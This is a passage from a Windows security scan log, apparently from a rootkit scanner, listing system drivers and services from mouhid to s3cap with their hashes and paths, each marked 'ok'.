09:21:46.0884 0x0304  [ 2C388D2CD01C9042596CF3C8F3C7B24D, B2FB72272BB01AEDA4047B57C943B7E9BD8A6497854F8CC34672AAA592D0A703 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
09:21:46.0884 0x0304  mouhid - ok
09:21:46.0915 0x0304  [ FC8771F45ECCCFD89684E38842539B9B, 806DDF2B4830CA866582FE74A521BB7DF26CA0E19013DAF584D3677FB48CC77A ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
09:21:46.0915 0x0304  mountmgr - ok
09:21:46.0962 0x0304  [ 2D699FB6E89CE0D8DA14ECC03B3EDFE0, D3D903EEA465D77345AAC9B9F02CDEADF4831212EA2DE4FCA33BEE26EBB47420 ] mpio            C:\Windows\system32\drivers\mpio.sys
09:21:46.0962 0x0304  mpio - ok
09:21:46.0998 0x0304  [ AD2723A7B53DD1AACAE6AD8C0BFBF4D0, 1D6DCFA0E56C3E55B6AED819176E751502F863BA0FCF4F0B3253A81D208141A2 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
09:21:46.0998 0x0304  mpsdrv - ok
09:21:47.0045 0x0304  [ 9835584E999D25004E1EE8E5F3E3B881, 71798B0CBE9AE69F1F29B845319019C69EC7F415CBABB3B87DDE92C360675021 ] MpsSvc          C:\Windows\system32\mpssvc.dll
09:21:47.0045 0x0304  MpsSvc - ok
09:21:47.0083 0x0304  [ 21F4B24ACFC79A483515BD986DD9043F, 22681907E02E0B723ABE2CEF0602D36C8EF862E7E2B62A9B40A5EF582E58D7BA ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
09:21:47.0083 0x0304  MRxDAV - ok
09:21:47.0114 0x0304  [ 5D16C921E3671636C0EBA3BBAAC5FD25, 5BC107B95CAFC88F51FBB9F657B99944B20627A2B618F263093D7045E4FFD65C ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
09:21:47.0130 0x0304  mrxsmb - ok
09:21:47.0161 0x0304  [ 6D17A4791ACA19328C685D256349FEFC, 012AA3D84EEAAF53780D06D2D11B9727DFC3441F3FAD75BC9E751FB814403668 ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
09:21:47.0161 0x0304  mrxsmb10 - ok
09:21:47.0183 0x0304  [ B81F204D146000BE76651A50670A5E9E, 78193D0F967BE9829E53F9B500342934B4B1E1F4CEFC444382959E2061BC3B17 ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
09:21:47.0183 0x0304  mrxsmb20 - ok
09:21:47.0214 0x0304  [ 012C5F4E9349E711E11E0F19A8589F0A, 208B92DFCF7AD43202660FBBC9FF5E03AEDBEE38178FF3628EB74CB6CD37C584 ] msahci          C:\Windows\system32\drivers\msahci.sys
09:21:47.0214 0x0304  msahci - ok
09:21:47.0229 0x0304  [ 55055F8AD8BE27A64C831322A780A228, C2C9FD1F61302997117B1CD0835E8234405BB80084065ED05363B77868397304 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
09:21:47.0229 0x0304  msdsm - ok
09:21:47.0245 0x0304  [ E1BCE74A3BD9902B72599C0192A07E27, 5162EB623FE64E9DFEAC6CA2410EFA1314E62EC13207FFBFED2D61AA887603C4 ] MSDTC           C:\Windows\System32\msdtc.exe
09:21:47.0245 0x0304  MSDTC - ok
09:21:47.0299 0x0304  [ DAEFB28E3AF5A76ABCC2C3078C07327F, 6EB558532400B489763BAE7203538DE5F196282A8CB46A1B31D59120FC5AFCEF ] Msfs            C:\Windows\system32\drivers\Msfs.sys
09:21:47.0299 0x0304  Msfs - ok
09:21:47.0299 0x0304  [ 3E1E5767043C5AF9367F0056295E9F84, B2EDFECD3C14E4FE1BA87D9A86334043A9BD696A554EBD186DA7EAEB2EBD4F70 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
09:21:47.0299 0x0304  mshidkmdf - ok
09:21:47.0346 0x0304  [ 0A4E5757AE09FA9622E3158CC1AEF114, ED574E420E57374E328C7C526504ECA569C164287966F06019EC207CB17F2C54 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
09:21:47.0346 0x0304  msisadrv - ok
09:21:47.0377 0x0304  [ 90F7D9E6B6F27E1A707D4A297F077828, BEFC220EAA7307849600748842ACB9254A6A91158812D9B23EFAF912C498BA7F ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
09:21:47.0377 0x0304  MSiSCSI - ok
09:21:47.0377 0x0304  msiserver - ok
09:21:47.0423 0x0304  [ 8C0860D6366AAFFB6C5BB9DF9448E631, 949C5A14E57F2D7385543C17C3485E7ADE36EA2016F6E0A1866571D2EDE90A77 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
09:21:47.0424 0x0304  MSKSSRV - ok
09:21:47.0443 0x0304  [ 3EA8B949F963562CEDBB549EAC0C11CE, 1B0B2F16A1790282504F3C548D47C3281EFB440D5D9711A1EF76D6371B768D2D ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
09:21:47.0443 0x0304  MSPCLOCK - ok
09:21:47.0459 0x0304  [ F456E973590D663B1073E9C463B40932, 48BA6D5580EE7B6A4C06E04772FD35B51779553FC0DD6C5C30DD8B5DEEB25B11 ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
09:21:47.0460 0x0304  MSPQM - ok
09:21:47.0479 0x0304  [ 0E008FC4819D238C51D7C93E7B41E560, 141FCEBDD05874407EAEC35A9DCD3BB16F2A428F23E55487D6A5DBFCADBF10D2 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
09:21:47.0482 0x0304  MsRPC - ok
09:21:47.0500 0x0304  [ FC6B9FF600CC585EA38B12589BD4E246, F05DB01AE1955D2468CE6B51E51998B111CA3B0BDEED090EE6B99B625CBA564A ] mssmbios        C:\Windows\system32\drivers\mssmbios.sys
09:21:47.0515 0x0304  mssmbios - ok
09:21:47.0531 0x0304  [ B42C6B921F61A6E55159B8BE6CD54A36, 6BB0A7BE005B8F281E551D1B8046CE4202372BC7AE0161881C858BFAC675FE1C ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
09:21:47.0531 0x0304  MSTEE - ok
09:21:47.0557 0x0304  [ 33599130F44E1F34631CEA241DE8AC84, E15B31D1AFDC8DC6D2B21D4215796A99ECC69EEDBB06CEED01AECC3C99A44C8B ] MTConfig        C:\Windows\system32\DRIVERS\MTConfig.sys
09:21:47.0558 0x0304  MTConfig - ok
09:21:47.0570 0x0304  [ 159FAD02F64E6381758C990F753BCC80, E55AB01DCFA95ECAB24A2A9656E28FF9D064BA08B3D82DC8AA42F5991BA09598 ] Mup             C:\Windows\system32\Drivers\mup.sys
09:21:47.0571 0x0304  Mup - ok
09:21:47.0606 0x0304  [ 9851A02617A77CE62F0E6C7D0BDD0701, D46C65FC4AE6F38F20AE4C445DD15D810F96FB8202960100791B170078EF2F55 ] myAgtSvc        C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe
09:21:47.0609 0x0304  myAgtSvc - ok
09:21:47.0652 0x0304  [ 61D57A5D7C6D9AFE10E77DAE6E1B445E, D252248532142E9E2332DA693BC51B795102CA938B568FF04981E98B19BFBC5C ] napagent        C:\Windows\system32\qagentRT.dll
09:21:47.0658 0x0304  napagent - ok
09:21:47.0698 0x0304  [ 26384429FCD85D83746F63E798AB1480, 957C115C263A4B4DC854558B43ECE632D8E2BCCB744E23A01EBA7476BA2E7FFB ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
09:21:47.0698 0x0304  NativeWifiP - ok
09:21:47.0799 0x0304  [ 8C9C922D71F1CD4DEF73F186416B7896, 15FF43CD90C7913F83B35F2E7986561584588E8A45196EBD965C3A355836A9C7 ] NDIS            C:\Windows\system32\drivers\ndis.sys
09:21:47.0814 0x0304  NDIS - ok
09:21:47.0830 0x0304  [ 0E1787AA6C9191D3D319E8BAFE86F80C, F535022747355B2C66424BDA892D7DCB820C2EB8EE05BAE5BC6D1B1D65186278 ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
09:21:47.0830 0x0304  NdisCap - ok
09:21:47.0846 0x0304  [ E4A8AEC125A2E43A9E32AFEEA7C9C888, 6EA181117126FC70B3C1DD1AC73CC26D1603A2CF49E47F66623E2C9489C49B55 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
09:21:47.0846 0x0304  NdisTapi - ok
09:21:47.0883 0x0304  [ D8A65DAFB3EB41CBB622745676FCD072, 874D3C3D247C4A309DA813DB1D2EDB0037D3C489824BD5FE95B0C20699764EF7 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
09:21:47.0883 0x0304  Ndisuio - ok
09:21:47.0930 0x0304  [ 38FBE267E7E6983311179230FACB1017, CFD1CBCA59650795C030DB30E5795B37C11C736E14003AE1DAB081BA5C0C9B14 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
09:21:47.0930 0x0304  NdisWan - ok
09:21:47.0961 0x0304  [ A4BDC541E69674FBFF1A8FF00BE913F2, 18CCFD063E9870B8B6958715BC0414C4D920AE63528EA1E9D7E30F7138918FFA ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
09:21:47.0961 0x0304  NDProxy - ok
09:21:47.0979 0x0304  [ 80B275B1CE3B0E79909DB7B39AF74D51, 75B406B0D9D28239D4EB2A298419A5F78A58237D88C5FD688EF1DFFAFACCF796 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
09:21:47.0980 0x0304  NetBIOS - ok
09:21:48.0015 0x0304  [ 280122DDCF04B378EDD1AD54D71C1E54, F98B2ADE34F7E67C7C06C1D0FFB80ECBC353D044D4B4784CD952910345DC2ED0 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
09:21:48.0015 0x0304  NetBT - ok
09:21:48.0030 0x0304  [ DD17E1573651293D4ED31053795B3471, 94F7D1BB1C3B0C1FAAEED07375DB0F3BC995394FB5C26983548D946C8D229D54 ] Netlogon        C:\Windows\system32\lsass.exe
09:21:48.0030 0x0304  Netlogon - ok
09:21:48.0061 0x0304  [ 7CCCFCA7510684768DA22092D1FA4DB2, BB9E4F8FABBF596D888E6D303CB54A336D9DFF95B36AEA9369D2ED787DDC4B5D ] Netman          C:\Windows\System32\netman.dll
09:21:48.0061 0x0304  Netman - ok
09:21:48.0114 0x0304  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:21:48.0130 0x0304  NetMsmqActivator - ok
09:21:48.0145 0x0304  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:21:48.0161 0x0304  NetPipeActivator - ok
09:21:48.0183 0x0304  [ 8C338238C16777A802D6A9211EB2BA50, 0D08A47CD403EDA5E8CAD7409BBBBCDC29A9861D2DC41D42B68B22B1AA1EBDD6 ] netprofm        C:\Windows\System32\netprofm.dll
09:21:48.0183 0x0304  netprofm - ok
09:21:48.0229 0x0304  [ 652881F65B35564575255A0E05E23C55, 6F77B2BD9362D7593B5B2A8AEAE834463CB32B006ABE2188A5A36C9469896960 ] netr28          C:\Windows\system32\DRIVERS\netr28.sys
09:21:48.0245 0x0304  netr28 - ok
09:21:48.0283 0x0304  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:21:48.0283 0x0304  NetTcpActivator - ok
09:21:48.0283 0x0304  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:21:48.0283 0x0304  NetTcpPortSharing - ok
09:21:48.0314 0x0304  [ 1D85C4B390B0EE09C7A46B91EFB2C097, 6A8850B151E88EE371F3CC543A946302DDF9494908D684B8B0C706A42CC54348 ] nfrd960         C:\Windows\system32\DRIVERS\nfrd960.sys
09:21:48.0314 0x0304  nfrd960 - ok
09:21:48.0361 0x0304  [ 374071043F9E4231EE43BE2BB48DD36D, C4FA3FC40CC49DBBB91901D14210A55D3831FAC9F9B3FF45FCA7F5CF242C9E92 ] NlaSvc          C:\Windows\System32\nlasvc.dll
09:21:48.0361 0x0304  NlaSvc - ok
09:21:48.0383 0x0304  [ 1DB262A9F8C087E8153D89BEF3D2235F, A51EE5D5AD3CD76B74BEA9C66C462608BF3B50C53DAA4110A75DB10495A8C101 ] Npfs            C:\Windows\system32\drivers\Npfs.sys
09:21:48.0383 0x0304  Npfs - ok
09:21:48.0398 0x0304  [ BA387E955E890C8A88306D9B8D06BF17, 3477BD9686C5777A93251C154512671AAA7533B18C536DF51F7B1D6D28E7F8A5 ] nsi             C:\Windows\system32\nsisvc.dll
09:21:48.0398 0x0304  nsi - ok
09:21:48.0414 0x0304  [ E9A0A4D07E53D8FEA2BB8387A3293C58, 690CAD6C4E35ECC1172A2E1FD3933DF73158B3BF42CB21244269612A53DE4D7A ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
09:21:48.0414 0x0304  nsiproxy - ok
09:21:48.0492 0x0304  [ C8DFF8D07755A66C7A4A738930F0FEAC, A2CC58312CE57988ABD976155BE91F558DCEC4C23481C6FBE64B361D511A36EA ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
09:21:48.0496 0x0304  Ntfs - ok
09:21:48.0543 0x0304  [ F9756A98D69098DCA8945D62858A812C, 572ADBFCFDE2030B34A013AADC14DBC144EB3F34D06991E2464A3EA9605BC045 ] Null            C:\Windows\system32\drivers\Null.sys
09:21:48.0543 0x0304  Null - ok
09:21:48.0583 0x0304  [ B3E25EE28883877076E0E1FF877D02E0, 402B6FED6FBBF645190396DC141141EF52DD059DABD01F8AC9CF01D23664070C ] nvraid          C:\Windows\system32\drivers\nvraid.sys
09:21:48.0583 0x0304  nvraid - ok
09:21:48.0599 0x0304  [ 4380E59A170D88C4F1022EFF6719A8A4, 93EDB3F4CDBF53C9C1970DD29AB146E390695C568180847BA8903F5FBEABCFF2 ] nvstor          C:\Windows\system32\drivers\nvstor.sys
09:21:48.0599 0x0304  nvstor - ok
09:21:48.0630 0x0304  [ 5A0983915F02BAE73267CC2A041F717D, D83461D74597BF2BE042FEFCC27FCD18BF63CB8135B0666D731D50951C3468A8 ] nv_agp          C:\Windows\system32\drivers\nv_agp.sys
09:21:48.0630 0x0304  nv_agp - ok
09:21:48.0714 0x0304  [ 84DE1DD996B48B05ACE31AD015FA108A, 4B9D1E4EF83ECED6C77F23D9879C124534F7053D7423E3A2D0F67A4A720CEA94 ] odserv          C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
09:21:48.0714 0x0304  odserv - ok
09:21:48.0745 0x0304  [ 08A70A1F2CDDE9BB49B885CB817A66EB, 0BB98123B544124B144F3E95D77E01E973D060B8B2302503FF24ABBBE803EB63 ] ohci1394        C:\Windows\system32\drivers\ohci1394.sys
09:21:48.0761 0x0304  ohci1394 - ok
09:21:48.0783 0x0304  [ 5A432A042DAE460ABE7199B758E8606C, 6E5D1F477D290905BE27CEBF9572BAC6B05FFEF2FAD901D3C8E11F665F8B9A71 ] ose             C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
09:21:48.0798 0x0304  ose - ok
09:21:48.0814 0x0304  [ 82A8521DDC60710C3D3D3E7325209BEC, C4E34571EDD57C7FBB3D736B5FE8BD154624705B5C8EA2EC898F19F75B9A5942 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
09:21:48.0829 0x0304  p2pimsvc - ok
09:21:48.0845 0x0304  [ 59C3DDD501E39E006DAC31BF55150D91, E02B63AB7F34CF6FF3F644AF354D10004E6F50014E03172D80BD78934EF71EF1 ] p2psvc          C:\Windows\system32\p2psvc.dll
09:21:48.0861 0x0304  p2psvc - ok
09:21:48.0883 0x0304  [ 2EA877ED5DD9713C5AC74E8EA7348D14, 14BA3722CE5F8FF07F2D97DCDD6558EB49C9B02E5E6FAD6D9F18D354733EFECE ] Parport         C:\Windows\system32\DRIVERS\parport.sys
09:21:48.0883 0x0304  Parport - ok
09:21:48.0914 0x0304  [ 3F34A1B4C5F6475F320C275E63AFCE9B, 31295D5121C0C3F2085E0EEBA260EEE4CA003993C026E2F81986D19158036E6B ] partmgr         C:\Windows\system32\drivers\partmgr.sys
09:21:48.0914 0x0304  partmgr - ok
09:21:48.0930 0x0304  [ EB0A59F29C19B86479D36B35983DAADC, AC09AFE7F13BE4079D01383BAC44091997E1AAF6512C9673A42B9E3780EB08A8 ] Parvdm          C:\Windows\system32\DRIVERS\parvdm.sys
09:21:48.0930 0x0304  Parvdm - ok
09:21:48.0982 0x0304  [ 3A55D53687F16D9EF5BF307BBFEFCD9C, F1BB1B43442B151686500768C43A4D20CAA47427E78386953A42DDB42D9DDF0C ] PcaSvc          C:\Windows\System32\pcasvc.dll
09:21:48.0986 0x0304  PcaSvc - ok
09:21:49.0019 0x0304  [ 673E55C3498EB970088E812EA820AA8F, 1F81315664B8CBFDD569416C0ECCE4C6251F34577313A0858AB46609781303B5 ] pci             C:\Windows\system32\drivers\pci.sys
09:21:49.0019 0x0304  pci - ok
09:21:49.0050 0x0304  [ AFE86F419014DB4E5593F69FFE26CE0A, CAF36E61BE7B511D3A03A65FF5A3017CEE4D2F53005B410F2D4A2AAE9FED4C00 ] pciide          C:\Windows\system32\drivers\pciide.sys
09:21:49.0050 0x0304  pciide - ok
09:21:49.0083 0x0304  [ F396431B31693E71E8A80687EF523506, BC614FC21E029E2497F1CCE3131BBD295B827F2310762B47D5BBC7703D80554B ] pcmcia          C:\Windows\system32\DRIVERS\pcmcia.sys
09:21:49.0083 0x0304  pcmcia - ok
09:21:49.0098 0x0304  [ 250F6B43D2B613172035C6747AEEB19F, A91F15B133F2619912CF750E6F3662E011CD0FA4B9477CE532CE3196D23307D9 ] pcw             C:\Windows\system32\drivers\pcw.sys
09:21:49.0098 0x0304  pcw - ok
09:21:49.0114 0x0304  pdfcDispatcher - ok
09:21:49.0179 0x0304  [ 344D1FA0438A967F1A2BAA42C86D6E19, E9CB31CBD9075B84BA771CF82A4C3AB5BF57ADEA3E76ABE8FE36FEACFD681D89 ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
09:21:49.0185 0x0304  PEAUTH - ok
09:21:49.0232 0x0304  [ AF4D64D2A57B9772CF3801950B8058A6, C9C493A3775E6E1660CE5DF75DA574D0C04245FB88CF41B96217A725359C350D ] PeerDistSvc     C:\Windows\system32\peerdistsvc.dll
09:21:49.0248 0x0304  PeerDistSvc - ok
09:21:49.0360 0x0304  [ 414BBA67A3DED1D28437EB66AEB8A720, D6DF254E2615FA402044824DCD9004F579FC0DF74B90E44C99D5F0253CF8AD88 ] pla             C:\Windows\system32\pla.dll
09:21:49.0386 0x0304  pla - ok
09:21:49.0432 0x0304  [ EC7BC28D207DA09E79B3E9FAF8B232CA, A42F8F69C3CD753D787A5D558659DEA2CC306C896D75B8C82549219CF654504F ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
09:21:49.0438 0x0304  PlugPlay - ok
09:21:49.0457 0x0304  [ 63FF8572611249931EB16BB8EED6AFC8, 9732CCBCB93A7A4BEC88812B952C20244479E9BD781240C195E57F09E619EA33 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
09:21:49.0459 0x0304  PNRPAutoReg - ok
09:21:49.0476 0x0304  [ 82A8521DDC60710C3D3D3E7325209BEC, C4E34571EDD57C7FBB3D736B5FE8BD154624705B5C8EA2EC898F19F75B9A5942 ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
09:21:49.0482 0x0304  PNRPsvc - ok
09:21:49.0534 0x0304  [ 53946B69BA0836BD95B03759530C81EC, 7F14A34635354CCA0F5342C8D9DF5A6AA1B94F6A508BD8834029E9BACF252920 ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
09:21:49.0540 0x0304  PolicyAgent - ok
09:21:49.0574 0x0304  [ F87D30E72E03D579A5199CCB3831D6EA, B09328E89954584F97908FA5946376BA990B8C650DABCBF3CA3B08719937C694 ] Power           C:\Windows\system32\umpo.dll
09:21:49.0577 0x0304  Power - ok
09:21:49.0599 0x0304  [ 631E3E205AD6D86F2AED6A4A8E69F2DB, 1D3BF0CFC37D91A3A56246920B9CF1084E78A055D56E85A773417809C58C8065 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
09:21:49.0599 0x0304  PptpMiniport - ok
09:21:49.0630 0x0304  [ 85B1E3A0C7585BC4AAE6899EC6FCF011, 1E067113C146D6842D7FB04007F363D6FB7783C6BC7C9AB6614E44075C4F86C3 ] Processor       C:\Windows\system32\DRIVERS\processr.sys
09:21:49.0630 0x0304  Processor - ok
09:21:49.0683 0x0304  [ CADEFAC453040E370A1BDFF3973BE00D, 2E3DD8DA702468D8AB0F3CE27188B1991D4CB015FB36BAE4C6E7996B61CF49B8 ] ProfSvc         C:\Windows\system32\profsvc.dll
09:21:49.0683 0x0304  ProfSvc - ok
09:21:49.0698 0x0304  [ DD17E1573651293D4ED31053795B3471, 94F7D1BB1C3B0C1FAAEED07375DB0F3BC995394FB5C26983548D946C8D229D54 ] ProtectedStorage C:\Windows\system32\lsass.exe
09:21:49.0698 0x0304  ProtectedStorage - ok
09:21:49.0745 0x0304  [ 6270CCAE2A86DE6D146529FE55B3246A, 463209CBAF1B0E269DC8FC6FBDEE5BB7E5ADB5D3F024930BFD0B97E0A9678883 ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
09:21:49.0745 0x0304  Psched - ok
09:21:49.0846 0x0304  [ A6A7AD767BF5141665F5C675F671B3E1, 11D43F732C3B82679E53516F83E675B60B0EFEDE3F4EE3C42AC752AD8D5155AF ] PSI_SVC_2       C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
09:21:49.0846 0x0304  PSI_SVC_2 - ok
09:21:49.0899 0x0304  [ AB95ECF1F6659A60DDC166D8315B0751, 0ED6D3460D28978BADF31B930DBB3298A6A10EFF8883763EABA0E36A21A0E83D ] ql2300          C:\Windows\system32\DRIVERS\ql2300.sys
09:21:49.0914 0x0304  ql2300 - ok
09:21:49.0930 0x0304  [ B4DD51DD25182244B86737DC51AF2270, 7E62B04F054A6330B7F9968222523BDE8F3EE47A11D17E6C0E2D5ACDC07B9E6B ] ql40xx          C:\Windows\system32\DRIVERS\ql40xx.sys
09:21:49.0945 0x0304  ql40xx - ok
09:21:49.0977 0x0304  [ 31AC809E7707EB580B2BDB760390765A, A8481FD19A0F778F5591B7676F591F664ADC68B6867E663C0F9564173F4AC909 ] QWAVE           C:\Windows\system32\qwave.dll
09:21:49.0982 0x0304  QWAVE - ok
09:21:49.0984 0x0304  [ 584078CA1B95CA72DF2A27C336F9719D, 836F115C92D343463C14A9DE39648C1EFA7C7EE4720F5C692EE0F68B84830121 ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
09:21:49.0984 0x0304  QWAVEdrv - ok
09:21:49.0999 0x0304  [ 30A81B53C766D0133BB86D234E5556AB, 726C6B83B5ACAA84CAB1689B6DD6DDAE3199D61A57B5D7B5B5A0F62FCF838090 ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
09:21:49.0999 0x0304  RasAcd - ok
09:21:50.0046 0x0304  [ 57EC4AEF73660166074D8F7F31C0D4FD, C66B425EC4DB5E7FD289AE631C9B019EB16717C55E80FAE964BB22203E4AACEF ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
09:21:50.0046 0x0304  RasAgileVpn - ok
09:21:50.0062 0x0304  [ A60F1839849C0C00739787FD5EC03F13, B210DFA5A843CF1DA73635F168E2EA5052CBED15C664F8523CDFB34CA165D0E0 ] RasAuto         C:\Windows\System32\rasauto.dll
09:21:50.0062 0x0304  RasAuto - ok
09:21:50.0062 0x0304  [ D9F91EAFEC2815365CBE6D167E4E332A, 8350457A39D141C13807E7DB5A8D4113197C4016F7744B9993391F4AEA0C4A5C ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
09:21:50.0077 0x0304  Rasl2tp - ok
09:21:50.0116 0x0304  [ CB9E04DC05EACF5B9A36CA276D475006, 4D8C0AEF1D4F84F375AD2BAF786C9F6C52316A3E655B913449E71AD7C0FCA56E ] RasMan          C:\Windows\System32\rasmans.dll
09:21:50.0116 0x0304  RasMan - ok
09:21:50.0132 0x0304  [ 0FE8B15916307A6AC12BFB6A63E45507, 64119474DE7499E6E8B82E78BBD50074B3AA70B3E8329089FAE9B7F29919004E ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
09:21:50.0132 0x0304  RasPppoe - ok
09:21:50.0148 0x0304  [ 44101F495A83EA6401D886E7FD70096B, 56A0CE5C89870752B9B2AB795C1A248CA28209E049B2F20CCA0308CBE2488A0A ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
09:21:50.0148 0x0304  RasSstp - ok
09:21:50.0180 0x0304  [ D528BC58A489409BA40334EBF96A311B, C71E9A4B101DB6C3183B9F97B9098D73D6FE1B12C05C2EB3CE8A8041BEE6BA61 ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
09:21:50.0183 0x0304  rdbss - ok
09:21:50.0199 0x0304  [ 0D8F05481CB76E70E1DA06EE9F0DA9DF, 2AFCBE3237D27AFBF095F91F1FCCA63E6890F34A9E4F00E5C34C92394CDA89FB ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
09:21:50.0199 0x0304  rdpbus - ok
09:21:50.0230 0x0304  [ 23DAE03F29D253AE74C44F99E515F9A1, 8FED93D10B2062F0526FE3508101F8FCF8F72DEB90AFB472EB7CBAE83A0EC430 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
09:21:50.0230 0x0304  RDPCDD - ok
09:21:50.0261 0x0304  [ B973FCFC50DC1434E1970A146F7E3885, BE797E5F5AE34D37F8DA1134CE94DD14DBE36D2BC405B97E992E2257848B7CA9 ] RDPDR           C:\Windows\system32\drivers\rdpdr.sys
09:21:50.0261 0x0304  RDPDR - ok
09:21:50.0283 0x0304  [ 5A53CA1598DD4156D44196D200C94B8A, 8112FE14FEC94C67B1C5BDE4171E37584F1D0098D2C557C9E4BDD3E0291E25E4 ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
09:21:50.0283 0x0304  RDPENCDD - ok
09:21:50.0283 0x0304  [ 44B0A53CD4F27D50ED461DAE0C0B4E1F, CDA80B08E67AD034081C0C920CD66147689F1844403CBC552F65005E7C011A91 ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
09:21:50.0283 0x0304  RDPREFMP - ok
09:21:50.0330 0x0304  [ CD9214A6AE17D188D17C3CF8CB9CC693, 2E16FF1F7446F0600D6519010FD05A30B94D97167C16B3E7FC396A97D8139D60 ] RDPWD           C:\Windows\system32\drivers\RDPWD.sys
09:21:50.0330 0x0304  RDPWD - ok
09:21:50.0376 0x0304  [ 518395321DC96FE2C9F0E96AC743B656, 5F6A0880B4F3EE7196259EA362DA9554B0687B0236F9A8E5CF7A4A77F01F1776 ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
09:21:50.0376 0x0304  rdyboost - ok
09:21:50.0392 0x0304  [ 001B4278407F4303EFC902A2B16F2453, 92A95B0EFAAE7ADC6380D5207C86CB45BEEAE6974417A13669484A9D179E69AC ] regi            C:\Windows\system32\drivers\regi.sys
09:21:50.0392 0x0304  regi - ok
09:21:50.0423 0x0304  [ 7B5E1419717FAC363A31CC302895217A, 048B96B127CC20833948DAE53C59886D5C725ECA7A744424A01339447D2DDC32 ] RemoteAccess    C:\Windows\System32\mprdim.dll
09:21:50.0423 0x0304  RemoteAccess - ok
09:21:50.0454 0x0304  [ CB9A8683F4EF2BF99E123D79950D7935, B9FA3E7E91E76D975CF40BFA37909E50F29CC13AB1399007884710651827E9AA ] RemoteRegistry  C:\Windows\system32\regsvc.dll
09:21:50.0454 0x0304  RemoteRegistry - ok
09:21:50.0480 0x0304  [ 78D072F35BC45D9E4E1B61895C152234, 80C924EE1156B4E3172E83DCB9C60817E87885FB9377647E0BF90153E415B1CA ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
09:21:50.0482 0x0304  RpcEptMapper - ok
09:21:50.0499 0x0304  [ 94D36C0E44677DD26981D2BFEEF2A29D, D77A93AC60536F3706E8A0154C0C2199E888B7748C84DB7437254FF175F4DF55 ] RpcLocator      C:\Windows\system32\locator.exe
09:21:50.0499 0x0304  RpcLocator - ok
09:21:50.0514 0x0304  [ 7660F01D3B38ACA1747E397D21D790AF, 04611B43705C064C2A8331F6D3F8E4530295694AE2C3E3EC3F62CFF4A5EFA88D ] RpcSs           C:\Windows\system32\rpcss.dll
09:21:50.0514 0x0304  RpcSs - ok
09:21:50.0545 0x0304  [ 032B0D36AD92B582D869879F5AF5B928, 0F8F18A6A0A689957B886D9368015889091094EDA18BE532093F06A70A7CE184 ] rspndr          C:\Windows\system32\DRIVERS\rspndr.sys
09:21:50.0545 0x0304  rspndr - ok
09:21:50.0583 0x0304  [ 7FA7F2E249A5DCBB7970630E15E1F482, 9633B193F3FDA67BC551C6DCA4788AB83E9F45F77763EE579D02FE5D6B80DEDF ] s3cap           C:\Windows\system32\drivers\vms3cap.sys
09:21:50.0583 0x0304  s3cap - ok
